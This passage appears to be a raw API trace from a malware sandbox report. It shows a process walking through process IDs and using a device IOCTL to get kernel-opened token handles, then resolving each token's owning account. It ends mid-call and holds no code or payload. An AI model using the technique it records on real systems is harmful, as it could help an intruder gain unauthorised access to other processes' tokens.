[0184.139] ObfDereferenceObject (Object=0xfffffa800202ea70) returned 0x14 [0184.139] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000844, DesiredAccess=0x8, TokenHandle=0xfffffa8003a9cfc0 | out: TokenHandle=0xfffffa8003a9cfc0*=0xc0) returned 0x0 [0184.139] ZwClose (Handle=0xffffffff80000844) returned 0x0 [0184.139] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.139] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.140] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.142] CloseHandle (hObject=0xc0) returned 1 [0184.142] CloseHandle (hObject=0xc4) returned 1 [0184.143] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x23c) returned 0xc4 [0184.143] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.143] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8002034370, HandleInformation=0x0) returned 0x0 [0184.143] ObOpenObjectByPointer (in: Object=0xfffffa8002034370, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000844) returned 0x0 [0184.143] ObfDereferenceObject (Object=0xfffffa8002034370) returned 0x14 [0184.143] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000844, DesiredAccess=0x8, TokenHandle=0xfffffa8003a9cfc0 | out: TokenHandle=0xfffffa8003a9cfc0*=0xc0) returned 0x0 [0184.143] ZwClose (Handle=0xffffffff80000844) returned 0x0 [0184.143] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.143] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.144] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.146] CloseHandle (hObject=0xc0) returned 1 [0184.147] CloseHandle (hObject=0xc4) returned 1 [0184.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c0) returned 0xc4 [0184.147] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.147] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa800203a060, HandleInformation=0x0) returned 0x0 [0184.147] ObOpenObjectByPointer (in: Object=0xfffffa800203a060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000844) returned 0x0 [0184.147] ObfDereferenceObject (Object=0xfffffa800203a060) returned 0x14 [0184.147] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000844, DesiredAccess=0x8, TokenHandle=0xfffffa8003a9cfc0 | out: TokenHandle=0xfffffa8003a9cfc0*=0xc0) returned 0x0 [0184.147] ZwClose (Handle=0xffffffff80000844) returned 0x0 [0184.147] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.148] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.148] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.150] CloseHandle (hObject=0xc0) returned 1 [0184.150] CloseHandle (hObject=0xc4) returned 1 [0184.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7c8) returned 0xc4 [0184.151] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.151] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8002059b30, HandleInformation=0x0) returned 0x0 [0184.151] ObOpenObjectByPointer (in: Object=0xfffffa8002059b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000844) returned 0x0 [0184.151] ObfDereferenceObject (Object=0xfffffa8002059b30) returned 0x14 [0184.151] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000844, DesiredAccess=0x8, TokenHandle=0xfffffa8003a9cfc0 | out: TokenHandle=0xfffffa8003a9cfc0*=0xc0) returned 0x0 [0184.151] ZwClose (Handle=0xffffffff80000844) returned 0x0 [0184.151] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.152] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.152] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.154] CloseHandle (hObject=0xc0) returned 1 [0184.154] CloseHandle (hObject=0xc4) returned 1 [0184.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x788) returned 0xc4 [0184.155] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.155] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa800205f1d0, HandleInformation=0x0) returned 0x0 [0184.155] ObOpenObjectByPointer (in: Object=0xfffffa800205f1d0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000844) returned 0x0 [0184.155] ObfDereferenceObject (Object=0xfffffa800205f1d0) returned 0x14 [0184.155] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000844, DesiredAccess=0x8, TokenHandle=0xfffffa8003a9cfc0 | out: TokenHandle=0xfffffa8003a9cfc0*=0xc0) returned 0x0 [0184.155] ZwClose (Handle=0xffffffff80000844) returned 0x0 [0184.155] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.155] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.156] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.158] CloseHandle (hObject=0xc0) returned 1 [0184.158] CloseHandle (hObject=0xc4) returned 1 [0184.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x484) returned 0xc4 [0184.158] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.158] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa800206e920, HandleInformation=0x0) returned 0x0 [0184.159] ObOpenObjectByPointer (in: Object=0xfffffa800206e920, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000844) returned 0x0 [0184.159] ObfDereferenceObject (Object=0xfffffa800206e920) returned 0x14 [0184.159] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000844, DesiredAccess=0x8, TokenHandle=0xfffffa8003a9cfc0 | out: TokenHandle=0xfffffa8003a9cfc0*=0xc0) returned 0x0 [0184.159] ZwClose (Handle=0xffffffff80000844) returned 0x0 [0184.159] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.159] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.159] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.161] CloseHandle (hObject=0xc0) returned 1 [0184.161] CloseHandle (hObject=0xc4) returned 1 [0184.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x138) returned 0xc4 [0184.161] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.162] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8001f23b30, HandleInformation=0x0) returned 0x0 [0184.162] ObOpenObjectByPointer (in: Object=0xfffffa8001f23b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000844) returned 0x0 [0184.162] ObfDereferenceObject (Object=0xfffffa8001f23b30) returned 0x14 [0184.162] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000844, DesiredAccess=0x8, TokenHandle=0xfffffa8003a9cfc0 | out: TokenHandle=0xfffffa8003a9cfc0*=0xc0) returned 0x0 [0184.162] ZwClose (Handle=0xffffffff80000844) returned 0x0 [0184.162] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.162] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.162] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.165] CloseHandle (hObject=0xc0) returned 1 [0184.165] CloseHandle (hObject=0xc4) returned 1 [0184.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x79c) returned 0xc4 [0184.165] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.165] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8001f73350, HandleInformation=0x0) returned 0x0 [0184.165] ObOpenObjectByPointer (in: Object=0xfffffa8001f73350, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000844) returned 0x0 [0184.165] ObfDereferenceObject (Object=0xfffffa8001f73350) returned 0x14 [0184.165] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000844, DesiredAccess=0x8, TokenHandle=0xfffffa8003a9cfc0 | out: TokenHandle=0xfffffa8003a9cfc0*=0xc0) returned 0x0 [0184.166] ZwClose (Handle=0xffffffff80000844) returned 0x0 [0184.166] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.166] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.166] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.168] CloseHandle (hObject=0xc0) returned 1 [0184.168] CloseHandle (hObject=0xc4) returned 1 [0184.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f4) returned 0xc4 [0184.168] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.168] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8001fcdb30, HandleInformation=0x0) returned 0x0 [0184.168] ObOpenObjectByPointer (in: Object=0xfffffa8001fcdb30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000844) returned 0x0 [0184.169] ObfDereferenceObject (Object=0xfffffa8001fcdb30) returned 0x14 [0184.169] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000844, DesiredAccess=0x8, TokenHandle=0xfffffa8003a9cfc0 | out: TokenHandle=0xfffffa8003a9cfc0*=0xc0) returned 0x0 [0184.169] ZwClose (Handle=0xffffffff80000844) returned 0x0 [0184.169] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.169] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.169] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.171] CloseHandle (hObject=0xc0) returned 1 [0184.171] CloseHandle (hObject=0xc4) returned 1 [0184.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xc4 [0184.171] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.171] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8001f5bb30, HandleInformation=0x0) returned 0x0 [0184.171] ObOpenObjectByPointer (in: Object=0xfffffa8001f5bb30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000844) returned 0x0 [0184.171] ObfDereferenceObject (Object=0xfffffa8001f5bb30) returned 0x14 [0184.171] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000844, DesiredAccess=0x8, TokenHandle=0xfffffa8003a9cfc0 | out: TokenHandle=0xfffffa8003a9cfc0*=0xc0) returned 0x0 [0184.171] ZwClose (Handle=0xffffffff80000844) returned 0x0 [0184.172] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.172] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.172] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.175] CloseHandle (hObject=0xc0) returned 1 [0184.175] CloseHandle (hObject=0xc4) returned 1 [0184.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0xc4 [0184.175] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.175] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8001f5eb30, HandleInformation=0x0) returned 0x0 [0184.175] ObOpenObjectByPointer (in: Object=0xfffffa8001f5eb30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000844) returned 0x0 [0184.175] ObfDereferenceObject (Object=0xfffffa8001f5eb30) returned 0x14 [0184.175] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000844, DesiredAccess=0x8, TokenHandle=0xfffffa8003a9cfc0 | out: TokenHandle=0xfffffa8003a9cfc0*=0xc0) returned 0x0 [0184.175] ZwClose (Handle=0xffffffff80000844) returned 0x0 [0184.175] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.175] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.175] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.178] CloseHandle (hObject=0xc0) returned 1 [0184.178] CloseHandle (hObject=0xc4) returned 1 [0184.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7dc) returned 0xc4 [0184.178] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.178] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8001f60b30, HandleInformation=0x0) returned 0x0 [0184.178] ObOpenObjectByPointer (in: Object=0xfffffa8001f60b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000844) returned 0x0 [0184.178] ObfDereferenceObject (Object=0xfffffa8001f60b30) returned 0x14 [0184.178] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000844, DesiredAccess=0x8, TokenHandle=0xfffffa8003a9cfc0 | out: TokenHandle=0xfffffa8003a9cfc0*=0xc0) returned 0x0 [0184.179] ZwClose (Handle=0xffffffff80000844) returned 0x0 [0184.179] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.179] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.179] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.866] CloseHandle (hObject=0xc0) returned 1 [0184.866] CloseHandle (hObject=0xc4) returned 1 [0184.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3b4) returned 0xc4 [0184.866] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.866] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, 